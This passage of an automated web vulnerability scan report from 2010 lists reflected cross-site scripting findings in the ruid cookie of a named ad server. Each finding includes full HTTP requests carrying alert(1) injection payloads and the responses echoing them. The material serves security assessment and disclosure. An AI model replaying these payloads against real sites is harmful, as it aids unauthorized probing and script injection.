
GET /a/7858/12593/22707-15.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=hr0kpYfmJaKf6nWigrprodDvJKGf7nKnhuzEaLTg; rdk9=0; put_1185=7574652266400145248; csi9=3182598.js^1^1290469839^1290469839; rdk15=0; rpb=5576%3D1%264210%3D1%263632%3D1%265421%3D1%264212%3D1%264894%3D1%264970%3D1%264940%3D1%265872%3D1%265884%3D1%264214%3D1%264554%3D1%264222%3D1%265671%3D1%264939%3D1%264705%3D1%262372%3D1%262206%3D1%262113%3D1%262112%3D1%263577%3D1%262765%3D1%262374%3D1; rdk=7856/12590; put_1523=585809c5-28c5-4848-a99c-7f4f9237f077; csi15=3152311.js^1^1290469846^1290469846&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; put_2081=CG-00000000329343779; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLZUZj+18GyLPZWNJJs7VW/GiUFnXQJ; put_1994=cdes03xfgoce; csi30=3178537.js^1^1290467968^1290467968&3173645.js^1^1290467838^1290467838&3177238.js^1^1290467837^1290467837&3176931.js^1^1290467822^1290467822&3177960.js^1^1290467807^1290467807&3173350.js^1^1290467806^1290467806&3175689.js^1^1290467749^1290467749&3173073.js^1^1290467747^1290467747&3182535.js^1^1290467742^1290467742&3173803.js^1^1290467740^1290467740; csi18=3165136.js^1^1290348146^1290348146&3153767.js^5^1290328815^1290335680&3149616.js^1^1290329176^1290329176&3149615.js^1^1290328453^1290328453&3149590.js^1^1290327188^1290327188&3177477.js^2^1290324300^1290324480&3170027.js^6^1290322854^1290323938&3149602.js^3^1290322132^1290322676&3149572.js^4^1290319540^1290321951&3171141.js^5^1290319432^1290321770; put_1430=a543a58e-2baf-45f7-a1bb-0a2ba6c33b25; au=GG8K86FH-LAEM-10.244.194.4; put_1197=3200630513076977442; khaos=GGTZ6NWQ-D-2XOG; ruid=439b2"-alert(1)-"2405f0f058e; csi2=3151648.js^1^1290470170^1290470170&3179880.js^1^1290469857^1290469857&3152310.js^1^1290469855^1290469855&3153722.js^1^1290469840^1290469840&3165013.js^2^1290469022^1290469214&3151249.js^1^1290469023^1290469023; put_1986=618312354976649179; put_1512=4cceb5c0-b82c-f0da-bbe7-e70ef7046a71; put_2054=af53dcd2-03db-4f4f-9fcc-47ea5739fe42; rdk2=0; rdk1=0; cd=false;

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 23:59:42 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/12593; expires=Tue, 23-Nov-2010 00:59:42 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 23-Nov-2010 00:59:42 GMT; max-age=10; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
_eep-Alive: timeout=5, max=3
_onnection: Keep-Alive
Content-Type: application/x-javascript
Connection: close
Content-Length: 2660

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3168958"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=439b2"-alert(1)-"2405f0f058e\" width=\"1\" height=\"1\" />
...[SNIP]...

2.133. http://optimized-by.rubiconproject.com/a/7858/12593/22707-2.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7858/12593/22707-2.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbb97"-alert(1)-"ae70d9c83f8 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7858/12593/22707-2.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=hr0kpYfmJaKf6nWigrprodDvJKGf7nKnhuzEaLTg; rdk9=0; put_1185=7574652266400145248; csi9=3182598.js^1^1290469839^1290469839; rdk15=0; rpb=5576%3D1%264210%3D1%263632%3D1%265421%3D1%264212%3D1%264894%3D1%264970%3D1%264940%3D1%265872%3D1%265884%3D1%264214%3D1%264554%3D1%264222%3D1%265671%3D1%264939%3D1%264705%3D1%262372%3D1%262206%3D1%262113%3D1%262112%3D1%263577%3D1%262765%3D1%262374%3D1; rdk=7856/12590; put_1523=585809c5-28c5-4848-a99c-7f4f9237f077; csi15=3152311.js^1^1290469846^1290469846&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; put_2081=CG-00000000329343779; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLZUZj+18GyLPZWNJJs7VW/GiUFnXQJ; put_1994=cdes03xfgoce; csi30=3178537.js^1^1290467968^1290467968&3173645.js^1^1290467838^1290467838&3177238.js^1^1290467837^1290467837&3176931.js^1^1290467822^1290467822&3177960.js^1^1290467807^1290467807&3173350.js^1^1290467806^1290467806&3175689.js^1^1290467749^1290467749&3173073.js^1^1290467747^1290467747&3182535.js^1^1290467742^1290467742&3173803.js^1^1290467740^1290467740; csi18=3165136.js^1^1290348146^1290348146&3153767.js^5^1290328815^1290335680&3149616.js^1^1290329176^1290329176&3149615.js^1^1290328453^1290328453&3149590.js^1^1290327188^1290327188&3177477.js^2^1290324300^1290324480&3170027.js^6^1290322854^1290323938&3149602.js^3^1290322132^1290322676&3149572.js^4^1290319540^1290321951&3171141.js^5^1290319432^1290321770; put_1430=a543a58e-2baf-45f7-a1bb-0a2ba6c33b25; au=GG8K86FH-LAEM-10.244.194.4; put_1197=3200630513076977442; khaos=GGTZ6NWQ-D-2XOG; ruid=fbb97"-alert(1)-"ae70d9c83f8; csi2=3151648.js^1^1290470170^1290470170&3179880.js^1^1290469857^1290469857&3152310.js^1^1290469855^1290469855&3153722.js^1^1290469840^1290469840&3165013.js^2^1290469022^1290469214&3151249.js^1^1290469023^1290469023; put_1986=618312354976649179; put_1512=4cceb5c0-b82c-f0da-bbe7-e70ef7046a71; put_2054=af53dcd2-03db-4f4f-9fcc-47ea5739fe42; rdk2=0; rdk1=0; cd=false;

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 23:59:31 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/12593; expires=Tue, 23-Nov-2010 00:59:31 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 23-Nov-2010 00:59:31 GMT; max-age=10; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
_eep-Alive: timeout=5, max=2
_onnection: Keep-Alive
Content-Type: application/x-javascript
Connection: close
Content-Length: 2660

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3168960"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=fbb97"-alert(1)-"ae70d9c83f8\" width=\"1\" height=\"1\" />
...[SNIP]...

2.134. http://optimized-by.rubiconproject.com/a/7858/12593/22707-9.js [ruid cookie] previous

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7858/12593/22707-9.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22671"-alert(1)-"22b5d7433f0 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/7858/12593/22707-9.js HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: put_1902=hr0kpYfmJaKf6nWigrprodDvJKGf7nKnhuzEaLTg; rdk9=0; put_1185=7574652266400145248; csi9=3182598.js^1^1290469839^1290469839; rdk15=0; rpb=5576%3D1%264210%3D1%263632%3D1%265421%3D1%264212%3D1%264894%3D1%264970%3D1%264940%3D1%265872%3D1%265884%3D1%264214%3D1%264554%3D1%264222%3D1%265671%3D1%264939%3D1%264705%3D1%262372%3D1%262206%3D1%262113%3D1%262112%3D1%263577%3D1%262765%3D1%262374%3D1; rdk=7856/12590; put_1523=585809c5-28c5-4848-a99c-7f4f9237f077; csi15=3152311.js^1^1290469846^1290469846&3153724.js^1^1290469831^1290469831&3151467.js^1^1290469819^1290469819&3161223.js^1^1290469817^1290469817&3151650.js^1^1290469748^1290469748&3165015.js^1^1290469014^1290469014&3141222.js^2^1290398961^1290399011&3174355.js^1^1290398957^1290398957; put_2081=CG-00000000329343779; rsid=EsaHQCD9pIJSVePhfwYEzrVgfqmY0U14pvzAE0m27GJPANHRUnKUEM1gN6NR349f2rdGzx5zznTOcowuGOs2UZAHpcBvGHLZUZj+18GyLPZWNJJs7VW/GiUFnXQJ; put_1994=cdes03xfgoce; csi30=3178537.js^1^1290467968^1290467968&3173645.js^1^1290467838^1290467838&3177238.js^1^1290467837^1290467837&3176931.js^1^1290467822^1290467822&3177960.js^1^1290467807^1290467807&3173350.js^1^1290467806^1290467806&3175689.js^1^1290467749^1290467749&3173073.js^1^1290467747^1290467747&3182535.js^1^1290467742^1290467742&3173803.js^1^1290467740^1290467740; csi18=3165136.js^1^1290348146^1290348146&3153767.js^5^1290328815^1290335680&3149616.js^1^1290329176^1290329176&3149615.js^1^1290328453^1290328453&3149590.js^1^1290327188^1290327188&3177477.js^2^1290324300^1290324480&3170027.js^6^1290322854^1290323938&3149602.js^3^1290322132^1290322676&3149572.js^4^1290319540^1290321951&3171141.js^5^1290319432^1290321770; put_1430=a543a58e-2baf-45f7-a1bb-0a2ba6c33b25; au=GG8K86FH-LAEM-10.244.194.4; put_1197=3200630513076977442; khaos=GGTZ6NWQ-D-2XOG; ruid=22671"-alert(1)-"22b5d7433f0; csi2=3151648.js^1^1290470170^1290470170&3179880.js^1^1290469857^1290469857&3152310.js^1^1290469855^1290469855&3153722.js^1^1290469840^1290469840&3165013.js^2^1290469022^1290469214&3151249.js^1^1290469023^1290469023; put_1986=618312354976649179; put_1512=4cceb5c0-b82c-f0da-bbe7-e70ef7046a71; put_2054=af53dcd2-03db-4f4f-9fcc-47ea5739fe42; rdk2=0; rdk1=0; cd=false;

Response

HTTP/1.1 200 OK
Date: Mon, 22 Nov 2010 23:59:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/12593; expires=Tue, 23-Nov-2010 00:59:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk9=0; expires=Tue, 23-Nov-2010 00:59:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2660

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3168962"
...[SNIP]...
<img src=\"http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=22671"-alert(1)-"22b5d7433f0\" width=\"1\" height=\"1\" />
...[SNIP]...

Report generated by XSS.CX at Mon Nov 22 18:28:09 CST 2010.